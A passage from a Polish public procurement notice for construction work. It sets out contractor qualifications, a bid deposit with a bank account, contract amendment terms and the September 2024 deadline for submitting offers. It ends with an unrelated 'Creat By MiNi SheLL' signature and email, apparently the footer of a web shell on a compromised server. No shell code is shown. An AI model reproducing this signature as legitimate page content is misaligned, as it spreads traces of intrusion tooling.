dot. budownictwa osób fizycznych lub dot. budownictwa jednorodzinnego, zagrodowego oraz innych budynków o kubaturze do 1000m3, a także obejmujące inne wyłączenia;<br/>6)	W przypadku osób, o których mowa powyżej, dopuszcza się również kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2023 poz. 334 ze zm.);<br/>7)	W przypadku osób będących obywatelami państwa członkowskich UE, Konfederacji Szwajcarskiej lub państwa członkowskich (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym – prawo do wykonywania samodzielnych funkcji technicznych w budownictwie na terytorium RP winno być potwierdzone na zasadach określonych w art. 20a ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów i inżynierów budownictwa (Dz.U. 2023 poz. 551 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 12.1.	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 20 000,00 zł.<br/>12.2.	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>12.3.	Wadium musi obejmować pełen okres związania ofertą.<br/>12.4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego nr: PEKAO S.A. O. Lublin 02 1240 5497 1111 0000 5006 4023 z dopiskiem: „Wadium dot. postępowania znak: „DA.232-3/24”. <br/>12.5.	Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>12.6.	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego),<br/>b)	gwaranta/poręczyciela oraz wskazanie ich siedzib,<br/>c)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>d)	kwotę gwarancji/poręczenia,<br/>e)	termin ważności gwarancji/poręczenia,<br/>f)	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>12.7.	W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>12.8.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>12.9.	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony zgodnie ustalają, że zakazuje się zmian istotnych postanowień zawartej umowy oraz wprowadzania do Umowy nowych postanowień, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, z zastrzeżeniem postanowień niniejszego paragrafu.<br/>2.	Zamawiający dopuszcza zmiany umowy w zakresie ceny / wynagrodzenia Wykonawcy w przypadkach opisanych w § 31 ust. 1 - 3 (roboty zamienne/wyroby zastępcze/roboty zaniechane) oraz w § 51 (m.in. zmiana VAT i minimalnego wynagrodzenia - art. 436 pkt 4 b ustawy PZP) i § 52 (waloryzacja - art. 439 ustawy PZP) Umowy;<br/>3.	Zamawiający dopuszcza zmiany umowy w zakresie terminu realizacji zamówienia na zasadach określonych w § 4 ust. 7 Umowy.<br/>4.	Zamawiający dopuszcza zmiany umowy w zakresie przedmiotu umowy w przypadku wystąpienia robót zaniechanych, o których mowa w § 31 ust. 3 Umowy, z zastrzeżeniem gwarantowanego wolumenu zamówienia na poziomie co najmniej 70 % całkowitej wartości wynagrodzenia umownego brutto, o którym mowa w § 5 ust. 1 Umowy.<br/>5.	Jeżeli w trakcie realizacji umowy Zamawiający lub Wykonawca dojdzie do wniosku, że w celu właściwej realizacji zamówienia istnieje potrzeba dokonania przewidzianej przez Zamawiającego w SWZ zmiany postanowień zawartej umowy, to każda ze Stron może się zwrócić do drugiej na piśmie z wnioskiem o dokonanie takiej zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-19 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">14.1. Wykonawca składa ofertę za pośrednictwem Platformy przetargowej dostępnej pod adresem: https://skansen-lublin.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-19 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com